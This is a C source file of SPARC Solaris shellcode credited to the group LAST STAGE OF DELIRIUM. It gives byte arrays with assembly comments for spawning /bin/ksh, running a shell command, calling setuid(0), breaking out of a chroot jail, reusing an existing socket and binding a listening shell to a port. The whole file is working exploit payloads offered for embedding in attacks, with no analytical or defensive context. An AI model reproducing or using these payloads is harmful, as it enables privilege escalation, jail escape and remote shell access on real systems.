/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for solaris 2.6 2.7 2.8 sparc                                  #*/

/*
syscall     %g1  %o0,%o1,%o2,%o3,%o4
----------- ---- ---------------------------------------------------------------
exec        x00b ->path="/bin/ksh",->[->a0=path,0]
exec        x00b ->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 uid=0
mkdir       x050 ->path="b..",mode= (each value is valid)
chroot      x03d ->path={"b..","."}
chdir       x00c ->path=".."
ioctl       x036 sfd,TI_GETPEERNAME=0x5491,->[mlen=0x54,len=0x54,->sadr=[]]
so_socket   x0e6 AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1 
bind        x0e8 sfd,->sadr=[0x33,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
listen      x0e9 sfd,backlog=5,vers= (not required in this syscall)
accept      x0ea sfd,0,0,vers= (not required in this syscall)
fcntl       x03e sfd,F_DUP2FD=0x09,fd={0,1,2}
*/

#if defined(SPARC) && defined(SOLARIS)

#ifdef ABOVE_SPARCV8PLUS
char shellcode[]=          /* 8*4+8 bytes                    */
    "\x9f\x41\x40\x01"     /* rd      %pc,%o7  ! >= sparcv8+ */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;
#endif

char shellcode[]=          /* 10*4+8 bytes                   */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;

char cmdshellcode[]=       /* 15*4+16+cmdlen bytes           */
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode-4>       */
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode>         */
    "\x7f\xff\xff\xff"     /* call    <cmdshellcode+4>       */
    "\x90\x03\xe0\x34"     /* add     %o7,52,%o0             */
    "\x92\x23\xe0\x20"     /* sub     %o7,32,%o1             */
    "\xa2\x02\x20\x0c"     /* add     %o0,12,%l1             */
    "\xa4\x02\x20\x10"     /* add     %o0,16,%l2             */
    "\xc0\x2a\x20\x08"     /* stb     %g0,[%o0+8]            */
    "\xc0\x2a\x20\x0e"     /* stb     %g0,[%o0+14]           */
    "\xd0\x23\xff\xe0"     /* st      %o0,[%o7-32]           */
    "\xe2\x23\xff\xe4"     /* st      %l1,[%o7-28]           */
    "\xe4\x23\xff\xe8"     /* st      %l2,[%o7-24]           */
    "\xc0\x23\xff\xec"     /* st      %g0,[%o7-20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh    -c  "
    /* command */
;

char setuidcode[]=         /* 3*4 bytes                      */
    "\x90\x08\x20\x01"     /* and     %g0,1,%o0              */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

char chrootcode[]=         /* 20*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <chrootcode-4>         */
    "\x20\xbf\xff\xff"     /* bn,a    <chrootcode>           */
    "\x7f\xff\xff\xff"     /* call    <chrootcode+4>         */
    "\x80\x61.."
    "\xc0\x2b\xe0\x08"     /* stb     %g0,[%o7+8]            */
    "\x90\x03\xe0\x05"     /* add     %o7,5,%o0              */
    "\x82\x10\x20\x50"     /* mov     0x50,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x03\xe0\x05"     /* add     %o7,5,%o0              */
    "\x82\x10\x20\x3d"     /* mov     0x3d,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xaa\x20\x3f\xe0"     /* sub     %g0,-32,%l5            */
    "\x90\x03\xe0\x06"     /* add     %o7,6,%o0              */
    "\x82\x10\x20\x0c"     /* mov     0x0c,%g1               */
    "\xaa\x85\x7f\xff"     /* addcc   %l5,-1,%l5             */
    "\x12\xbf\xff\xfd"     /* ble     <chrootcode+48>        */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x03\xe0\x07"     /* add     %o7,7,%o0              */
    "\x82\x10\x20\x3d"     /* mov     0x3d,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

char findsckcode[]=        /* 35*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <findsckcode+4>        */
    "\x33\x02\x12\x34"
    "\xa0\x10\x20\xff"     /* mov     0xff,%l0               */
    "\xa2\x10\x20\x54"     /* mov     0x54,%l1               */
    "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2            */
    "\xaa\x03\xe0\x28"     /* add     %o7,40,%l5             */
    "\x81\xc5\x60\x08"     /* jmp     %l5+8                  */
    "\xc0\x2b\xe0\x04"     /* stb     %g0,[%o7+4]            */
    "\xe6\x03\xff\xd0"     /* ld      [%o7-48],%l3           */
    "\xe8\x03\xe0\x04"     /* ld      [%o7+4],%l4            */
    "\xa8\xa4\xc0\x14"     /* subcc   %l3,%l4,%l4            */
    "\x02\xbf\xff\xfb"     /* bz      <findsckcode+32>       */
    "\xaa\x03\xe0\x5c"     /* add     %o7,92,%l5             */
    "\xe2\x23\xff\xc4"     /* st      %l1,[%o7-60]           */
    "\xe2\x23\xff\xc8"     /* st      %l1,[%o7-56]           */
    "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]           */
    "\x90\x04\x20\x01"     /* add     %l0,1,%o0              */
    "\xa7\x2c\x60\x08"     /* sll     %l1,8,%l3              */
    "\x92\x14\xe0\x91"     /* or      %l3,0x91,%o1           */
    "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2            */
    "\x82\x10\x20\x36"     /* mov     0x36,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x1a\xbf\xff\xf1"     /* bcc     <findsckcode+36>       */
    "\xa0\xa4\x20\x01"     /* deccc   %l0                    */
    "\x12\xbf\xff\xf5"     /* bne     <findsckcode+60>       */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x90\x04\x20\x02"     /* add     %l0,2,%o0              */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfb"     /* bne     <findsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

char bindsckcode[]=        /* 34*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <bindsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <bindsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <bindsckcode+4>        */
    "\x33\x02\x12\x34"
    "\x90\x10\x20\x02"     /* mov     0x02,%o0               */
    "\x92\x10\x20\x02"     /* mov     0x02,%o1               */
    "\x94\x08\x20\x01"     /* and     %g0,1,%o2              */
    "\x96\x08\x20\x01"     /* and     %g0,1,%o3              */
    "\x98\x10\x20\x01"     /* mov     0x01,%o4               */
    "\x82\x10\x20\xe6"     /* mov     0xe6,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xa2\x22\x3f\xff"     /* sub     %o0,-1,%l1             */
    "\xc0\x23\xe0\x08"     /* st      %g0,[%o7+8]            */
    "\x92\x03\xe0\x04"     /* add     %o7,4,%o1              */
    "\x94\x10\x20\x10"     /* mov     0x10,%o2               */
    "\x96\x10\x20\x02"     /* mov     0x02,%o3               */
    "\x82\x10\x20\xe8"     /* mov     0xe8,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x04\x7f\xff"     /* add     %l1,-1,%o0             */
    "\x92\x10\x20\x05"     /* mov     0x05,%o1               */
    "\x82\x10\x20\xe9"     /* mov     0xe9,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x04\x7f\xff"     /* add     %l1,-1,%o0             */
    "\x92\x08\x20\x01"     /* and     %g0,1,%o1              */
    "\x94\x08\x20\x01"     /* and     %g0,1,%o2              */
    "\x82\x10\x20\xea"     /* mov     0xea,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfc"     /* bne     <bindsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                  */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0                */
;

#define FINDSCKPORTOFS     14
#define BINDSCKPORTOFS     14

#endif
